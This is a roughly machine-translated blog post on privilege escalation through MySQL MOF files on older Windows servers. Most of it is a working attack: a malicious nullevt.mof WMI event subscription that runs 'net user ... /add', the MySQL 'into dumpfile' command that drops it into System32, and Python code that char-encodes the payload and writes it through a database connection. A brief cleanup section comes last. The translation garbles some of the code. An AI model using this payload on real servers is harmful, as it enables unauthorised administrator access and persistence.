A study on the rights of MySQL MOF

Inadvertently see the right way about MySQL, while there is free time to study up, found that there are quite a lot of places on the internet is not detailed enough, the study time also stuck for a while.

Usage Prerequisites:

1. Operating system for Windows

2. Operating system version should not be too high, 2008 test does not pass, 2003 can (because need to access to the directory in System32) or the MySQL boot identity has permission to access and write to the C:/windows/system32/mof directory

3. The database is MySQL and knows the MySQL login password and allows the external connection (or the presence of SQL injection or Webshell operation, not practiced)

Let's start with a brief introduction (excerpt from the Internet and personal practice)

Placed in c:/windows/system32/ The Nullevt.mof file in the MOF directory is automatically executed and disappears every five seconds, and if no new file is created in the future, the contents of the previous nullevt.mof are cycled every five seconds, so only the malicious code needs to be written to the file.

Use code in public nullevt.mof online

#pragma namespace ("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {eventnamespace = "root\\cimv2 ”; Name = "FiltP2"; Query = "SELECT * from __InstanceModificationEvent" "Where targetinstance Isa \" Win32_localtime\ "" and targetinstance.se cond = 5 "; QueryLanguage = "WQL";}; Instance of Activescripteventconsumer as $Consumer {Name = "consPCSV2"; Scriptingengine = "JScript"; ScriptText = "var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user xxx xxx/add\ ")";}; Instance of __filtertoconsumerbinding{consumer = $Consumer; Filter = $EventFilter;};

The general use process steps are as follows:

1. Upload the file to any location on the server, any name

2. Via MySQL statement select Load_file (uploaded file path) into DumpFile ' C:/windows/system32/mof/nullevt.mof '

Then, if a successful upload, after a period of time, the embedded code inside will be executed

Personally think to upload files appear too troublesome, can directly select ' xxxxx ' into, after the attempt, to transcode the content after the query can be, provide part of the PY code as a demonstration

Using the char function in MySQL to solve

Payload = r ' #pragma  namespace ("\\\\.\\root\\subscription") instance of __eventfilter  as  $EventFilter  { EventNamespace =  "root\\cimv2"; name =  "filtP2 "; query = " select * from __instancemodificationevent  " " Where  Targetinstance isa \ "win32_localtime\"   " " and targetinstance.second = 5 ";  QueryLanguage =  "WQL";  };instance of activescripteventconsumer as $ consumer { name =  "consPCSV2"; scriptingengine =  "JScript";  scripttext  =  "Var wsh = new activexobject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe user  xxxx xxx /add\ ")";  };instance of __filtertoconsumerbinding { consumer  =  $Consumer; filter =  $EventFilter; }; " ascii_payload =  ' FOR EACH_CHR IN&NBsp;payload:    ascii_payload += str (Ord (EACH_CHR))  +  ', ' ascii_payload  = ascii_payload[:-1]cur = conn.cursor () sql =  "Select char (%s)  into  dumpfile  ' c:/windows/system32/wbem/mof/nullevt.mof '  % ascii_payloadcur.execute (SQL)

Since MOF is performed by the system, permissions are sufficient to create a user, add an administrator, and so on, to complete the process of extracting power.

If the server discovers that the MOF is being used to raise the rights, how can the user be resolved to create loops?

Open cmd using the following command

net stop WinMgmt

Delete the contents of the folder C:/windows/system32/wbem/repository

net start WinMgmt

Can

Where the error is, please correct it.

This article is from the "z2p blog" blog, make sure to keep this source http://z2ppp.blog.51cto.com/11186185/1975985

A study on the rights of MySQL MOF